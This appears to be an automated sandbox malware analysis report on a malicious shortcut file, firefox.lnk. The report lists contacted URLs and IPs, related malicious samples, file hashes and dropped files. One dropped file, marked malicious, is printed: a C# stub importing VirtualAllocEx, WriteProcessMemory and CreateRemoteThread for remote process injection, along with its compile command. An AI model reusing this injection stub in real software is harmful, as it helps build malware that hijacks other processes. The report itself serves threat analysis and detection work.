                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.323735392.000001A6283B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A6283FC000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://github.compowershell.exe, 00000000.00000002.323735392.000001A626D34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A626D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627352000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://raw.githubusercontpowershell.exe, 00000000.00000002.323735392.000001A626D87000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.323735392.000001A6283B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A6283FC000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://github.compowershell.exe, 00000000.00000002.323735392.000001A625DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A626933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627349000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://raw.githubusercontent.compowershell.exe, 00000000.00000002.323735392.000001A626D87000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.323735392.000001A6285C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://raw.githubusercontent.compowershell.exe, 00000000.00000002.323735392.000001A626D87000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://oneget.orgXpowershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://github.comxpowershell.exe, 00000000.00000002.323735392.000001A626094000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://oneget.orgformat.ps1xmlagement.dll2040.missionsandpowershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://127.0.0.1:%u/powershell.exe, 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.323735392.000001A625BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://oneget.orgpowershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.199.108.133
                                		raw.githubusercontent.comNetherlands
                                		54113FASTLYUStrue
                                140.82.121.3
                                		github.comUnited States
                                		36459GITHUBUSfalse
                                140.82.121.4
                                		unknownUnited States
                                		36459GITHUBUSfalse

                                General Information

                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:788724
                                Start date and time:2023-01-21 01:13:22 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 4m 46s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:firefox.lnk
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:4
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winLNK@6/11@3/3
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 94%
                                • Number of executed functions: 18
                                • Number of non-executed functions: 1
                                Cookbook Comments:
                                • Found application associated with file extension: .lnk
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Execution Graph export aborted for target powershell.exe, PID 5336 because it is empty
                                • Not all processes where analyzed, report is missing behavior information

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                01:14:20API Interceptor46x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                185.199.108.1337024Zc8v11Get hashmaliciousBrowse
                                  http://clickserve.dartsearch.net/link/click?&ds_a_cid=680760384&ds_a_caid=12694754542&ds_a_agid=123477218634&ds_a_fiid=&ds_a_lid=&&ds_e_adid=512650395034&ds_e_matchtype=&ds_e_device=c&ds_e_network=&&ds_url_v=2&ds_dest_url=https%3a%2f%2fp7mts5.codesandbox.io?yt=fatty.santos@digital14.comGet hashmaliciousBrowse
                                    0E3D668E96E879C92E67A13AC8544082F799C77290273.exeGet hashmaliciousBrowse
                                      Mefolis.exeGet hashmaliciousBrowse
                                        Setup.exeGet hashmaliciousBrowse
                                          Notepad++.exeGet hashmaliciousBrowse
                                            Q6dPPMwLOCGet hashmaliciousBrowse
                                              CoDUO.FoV.Changer.exeGet hashmaliciousBrowse
                                                xymhgG2BLO.exeGet hashmaliciousBrowse
                                                  Z5vsbIVsGa.exeGet hashmaliciousBrowse
                                                    035WpBiQgW.exeGet hashmaliciousBrowse
                                                      Video_017mp4.exeGet hashmaliciousBrowse
                                                        Video_0025.mp4.exeGet hashmaliciousBrowse
                                                          file.exeGet hashmaliciousBrowse
                                                            file.exeGet hashmaliciousBrowse
                                                              Jhj5r6E7h8.exeGet hashmaliciousBrowse
                                                                file.exeGet hashmaliciousBrowse
                                                                  3228QkgALx.exeGet hashmaliciousBrowse
                                                                    SNRLdPwLiS.exeGet hashmaliciousBrowse
                                                                      o3Nqa35sgH.exeGet hashmaliciousBrowse
                                                                        140.82.121.30XzeMRyE1e.exeGet hashmaliciousBrowse
                                                                        • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                                                                        MzRn1YNrbz.exeGet hashmaliciousBrowse
                                                                        • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                                                                        RfORrHIRNe.docGet hashmaliciousBrowse
                                                                        • github.com/ssbb36/stv/raw/main/5.mp3

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        github.comfile.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        0E3D668E96E879C92E67A13AC8544082F799C77290273.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        Mefolis.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        DHL SHIPMENT_AWB#00756543.pdf.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        Setup.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        Notepad++.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        Notepad++.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        6933838.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        https://j.mp/fgp88Get hashmaliciousBrowse
                                                                        • 140.82.121.10
                                                                        7rbQGFRH7c.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        Maersk Advisory.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        qYRH1xLXwo.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        Web.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        Web.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        wAobPph4w9.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        HAWB609876654.PDF.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        DHL58976098.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        AmazonDelivery.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        GiaqsSm7f8.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        GITHUBUSfile.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        http://clickserve.dartsearch.net/link/click?&ds_a_cid=680760384&ds_a_caid=12694754542&ds_a_agid=123477218634&ds_a_fiid=&ds_a_lid=&&ds_e_adid=512650395034&ds_e_matchtype=&ds_e_device=c&ds_e_network=&&ds_url_v=2&ds_dest_url=https%3a%2f%2fp7mts5.codesandbox.io?yt=fatty.santos@digital14.comGet hashmaliciousBrowse
                                                                        • 140.82.114.21
                                                                        0E3D668E96E879C92E67A13AC8544082F799C77290273.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        Mefolis.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        DHL SHIPMENT_AWB#00756543.pdf.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        Setup.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        Notepad++.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        Notepad++.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        6933838.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        https://j.mp/fgp88Get hashmaliciousBrowse
                                                                        • 140.82.121.10
                                                                        7rbQGFRH7c.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        Maersk Advisory.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        qYRH1xLXwo.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        Web.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        Web.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        wAobPph4w9.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        HAWB609876654.PDF.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        DHL58976098.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.3
                                                                        Z5vsbIVsGa.exeGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        AmazonDelivery.jarGet hashmaliciousBrowse
                                                                        • 140.82.121.4
                                                                        FASTLYUSFinal Payment globeandmail.shtmlGet hashmaliciousBrowse
                                                                        • 151.101.1.229
                                                                        https://d8wgyfhda663c06be7f17b7.pacificx.ru/Get hashmaliciousBrowse
                                                                        • 151.101.1.140
                                                                        http://cineb.netGet hashmaliciousBrowse
                                                                        • 151.101.0.84
                                                                        https://metrocodeanalysis-my.sharepoint.com/:o:/g/personal/jbaisden_metrocode_com/EkDeK7ZDuJhIlEJDt5dCOJoB7BQqpXeDQaKglspJMdGNuA?e=5%3a1uQlxW&at=9Get hashmaliciousBrowse
                                                                        • 151.101.194.159
                                                                        ApkProtector.apkGet hashmaliciousBrowse
                                                                        • 151.101.2.132
                                                                        net.bitburst.pollpay.apkGet hashmaliciousBrowse
                                                                        • 151.101.2.133
                                                                        https://sunterra.ziflow.io/proof/u7c5sbfs5l2e5a3r041ddel2aeGet hashmaliciousBrowse
                                                                        • 151.101.1.26
                                                                        https://sunterra.ziflow.io/proof/u7c5sbfs5l2e5a3r041ddel2aeGet hashmaliciousBrowse
                                                                        • 151.101.1.26
                                                                        net.bitburst.pollpay.apkGet hashmaliciousBrowse
                                                                        • 151.101.66.133
                                                                        https://www.pdfsharkapp.com/install-app/?dist=ggl&campaign_id=19459211477&adgroup_id=144907675117&placement_id=medicscenter.com&creative_id=643935168887&bd=PSUSAUDRS&d_id=ggl&lp_id=install-app&appid=1651396215983137&gclid=EAIaIQobChMIp9_S6a3W_AIVtLZxCh1-SweZEAEYASAAEgIRe_D_BwEGet hashmaliciousBrowse
                                                                        • 151.101.1.44
                                                                        7024Zc8v11Get hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        https://zeroheight.com/54b62af31/p/62b3d3-january-2023-efax-onlineGet hashmaliciousBrowse
                                                                        • 151.101.194.110
                                                                        http://clickserve.dartsearch.net/link/click?&ds_a_cid=680760384&ds_a_caid=12694754542&ds_a_agid=123477218634&ds_a_fiid=&ds_a_lid=&&ds_e_adid=512650395034&ds_e_matchtype=&ds_e_device=c&ds_e_network=&&ds_url_v=2&ds_dest_url=https%3a%2f%2fp7mts5.codesandbox.io?yt=fatty.santos@digital14.comGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        http://kw4cgwa.describeprefer.co.in/235256643562325363523763622?_branch_match_id=1144871843522394308&utm_medium=marketing&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXTytNLCjWSywo0MvJzMvWr6jySQtyNMnPL08CADdpT30iAAAAGet hashmaliciousBrowse
                                                                        • 151.101.1.26
                                                                        http://mailto:unusual.sign-in.activity@techconsulting-pay-3.com?&cc=unusual.sign-in.activity@techconsulting-pay-3.com&Subject=Unsubscribe+meGet hashmaliciousBrowse
                                                                        • 151.101.194.49
                                                                        http://www.learnomate.org/how-to-stop-asm-instance-for-standalone-databaseGet hashmaliciousBrowse
                                                                        • 151.101.193.26
                                                                        http://Padlet.com/fehoget244/y4ilxldttu5jb77vGet hashmaliciousBrowse
                                                                        • 151.101.1.46
                                                                        https://www.smore.com/c0uk3Get hashmaliciousBrowse
                                                                        • 151.101.1.140
                                                                        https://app.decktopus.com/share/WLA5BsGcW/s/1Get hashmaliciousBrowse
                                                                        • 151.101.1.229
                                                                        Statement.xlsxGet hashmaliciousBrowse
                                                                        • 151.101.2.110

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        54328bd36c14bd82ddaa0c04b25ed9ada4weba9Z5M.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        XeC4UeLl9H.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        0fRP2RFYSY.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        6pfVfqQAwv.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        qmQE12Fubq.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        AnydeskSetup_26b30163.msiGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        Invoice#324621.oneGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        SecuriteInfo.com.Variant.Marsilia.2083.15907.31615.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        SecuriteInfo.com.Variant.Marsilia.2083.7745.11717.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        SecuriteInfo.com.Variant.Marsilia.2083.26360.7272.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        SecuriteInfo.com.Variant.Marsilia.2083.1176.50.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        SecuriteInfo.com.Variant.Marsilia.2083.1776.31846.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        Qp0NtYJBeV.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        f9nBTm6uVU.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4
                                                                        4.exeGet hashmaliciousBrowse
                                                                        • 185.199.108.133
                                                                        • 140.82.121.4

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1256
                                                                        Entropy (8bit):5.3550697444759265
                                                                        Encrypted:false
                                                                        SSDEEP:24:30PpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJnc+T:kPerB4nqRL/HvFe9t4Cv94anc+T
                                                                        MD5:029575413A683689957D85CB6AD52170
                                                                        SHA1:A13788945AB66296276C0FFD6BFDF506A13D85A0
                                                                        SHA-256:6403C49150F2A813071DA157ED729DA4003797DA75A4BDBA42956FC342C5102F
                                                                        SHA-512:FC9D763B004145A93EAE3EC950F269D8FD342BBEE67A08EDE454889CC20DC58419547431D0D024C111F8ADD91C1CE11A3FA0E0C5866AB344F5C2A29407EAFD39
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                        C:\Users\user\AppData\Local\Temp\RES9A43.tmp

                                                                        Download File
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Sat Jan 21 09:14:21 2023, 1st section name ".debug$S"
                                                                        Category:dropped
                                                                        Size (bytes):1332
                                                                        Entropy (8bit):4.019616510288742
                                                                        Encrypted:false
                                                                        SSDEEP:24:HxzW9n7FsiZH4FhKqxmNII+ycuZhN6akSCPNnq92d:g7FsiZgKqxmu1ul6a3Oq9G
                                                                        MD5:CEE23EC1EAE4F9989E433101A4368B26
                                                                        SHA1:E5A091985690AE3FBA7636E713170E30B9BC825C
                                                                        SHA-256:D8456F94ACEF19371292721D5CAD1E09E050B78D373011BCC324890953489DC4
                                                                        SHA-512:3399D790FFE0E8A21F19144F0CA1C12E9390B8F7236E56F693C1FF0EECB3D909C5855B4041BC6E244A3546845A8D53821BEAEBEB720B4906AE704BD00F1B5F84
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:L.....c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\h4qpy1nu\CSCE97AB74AE4304D2FB93613F88A1756.TMP..........................;.}..........5.......C:\Users\user\AppData\Local\Temp\RES9A43.tmp.-.<...................'...Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.4.q.p.y.1.n.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4g5snjau.br2.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aezwvjpo.fls.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview:1

                                                                        C:\Users\user\AppData\Local\Temp\h4qpy1nu\CSCE97AB74AE4304D2FB93613F88A1756.TMP

                                                                        Download File
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:MSVC .res
                                                                        Category:dropped
                                                                        Size (bytes):652
                                                                        Entropy (8bit):3.110138796520372
                                                                        Encrypted:false
                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryehak7YnqqbGPN5Dlq5J:+RI+ycuZhN6akSCPNnqX
                                                                        MD5:B8AECFAFE99DC7FEC49D9BFF1B3BD87D
                                                                        SHA1:9B63DD7D5DA11A088C952D811492E33588646A9D
                                                                        SHA-256:96D8C7529F516117A0AD0A74BF2D2E570FC121592974DE29E1438E6A4161725A
                                                                        SHA-512:B7AD8925424AE378844D62E95C4759F96630F8F98378717C2D0508B936BD4DFAC5A119F437ADFEA8F3DEFE92038B8BC195C17BDD2E54B6795CDBBCF8BC249AA3
                                                                        Malicious:false
                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.4.q.p.y.1.n.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.4.q.p.y.1.n.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                        C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.0.cs

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                        Category:dropped
                                                                        Size (bytes):491
                                                                        Entropy (8bit):4.782692006011068
                                                                        Encrypted:false
                                                                        SSDEEP:6:V/DsYLDS81zuVeFMG4SRHq1P7WVR4SR7Lu0bWLFfy4SRBHAHNQEc7+LTGxq1ny:V/DTLDfuQ5uPC7LKqtORca+8ny
                                                                        MD5:0CFC2B2C9367E24E19E35107F7723143
                                                                        SHA1:AC85ECE6B6C0FA1F66FCD0C83493763696EC9E45
                                                                        SHA-256:603A2FEE8877B5D8C7E5406AC35D5AA30E0D2779A883EA9ADDC7D01D4DB653FE
                                                                        SHA-512:CC041CD7BC1833731B49D7451F19508AB691EBDD387A4158F4742528C65F6677F74F3212B34759BC45F763E5207733A5B9A47A2CB082E8331B040A4831B2FB66
                                                                        Malicious:true
                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace x.{. public class y. {. [DllImport("kernel32.dll")]public static extern IntPtr VirtualAllocEx(IntPtr a, IntPtr b, uint c, uint d, uint e);.[DllImport("kernel32.dll")]public static extern bool WriteProcessMemory(IntPtr a, IntPtr b, byte[] c, uint d, out int e);.[DllImport("kernel32.dll")]public static extern IntPtr CreateRemoteThread(IntPtr a, IntPtr b, uint c, IntPtr d, IntPtr e, uint f, out IntPtr g);.. }..}.

                                                                        C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdline

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):371
                                                                        Entropy (8bit):5.273447600596019
                                                                        Encrypted:false
                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fdUdC0zxs7+AEszI923fdUdgn:p37Lvkmb6KzFSWZE2FXn
                                                                        MD5:AB5D80C5BA50478A0B37D82D1269DECE
                                                                        SHA1:55986394841F97A0F57E0D59BF941388ADED75DE
                                                                        SHA-256:56C8DD4B87671F9784D09F935393DC7FD73F2E8480ACC948476DB0A8F928B8BB
                                                                        SHA-512:B27FD4DCA17C82D11C5C97BDCAE5EA0A097F5D24D1E6F29FEDACB257CFDF8081DDEF03A6DC549BDE26BE7944BA183D6F23BD94DA339F355C406E57BB8302A6DE
                                                                        Malicious:true
                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.0.cs"

                                                                        C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.dll

                                                                        Download File
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):3584
                                                                        Entropy (8bit):2.6739758238404927
                                                                        Encrypted:false
                                                                        SSDEEP:24:etGSLMhWPMqliM73pyLp5wJmtnAQootkZfk4g7mswWI+ycuZhN6akSCPNnq:62/qv7py79HOJk4g6sr1ul6a3Oq
                                                                        MD5:639F48E4D905E04FDF0C5E3F207B6272
                                                                        SHA1:D8700691819772975E74FC24C319D3F4DD0C6195
                                                                        SHA-256:226CA40953573C81CD8A74CF03F292E84A42DC2527825D241B6EEBAA6FDEDBA4
                                                                        SHA-512:ED353E305BC05824E41ABF1CB9AD6ACCA2B5A59ED30744EFBBE726D2E943603BDC7A2DF1C08C248D9C16A4FBFC8CD27BC0ACAA9C1BC295B23352B0F128889DF7
                                                                        Malicious:false
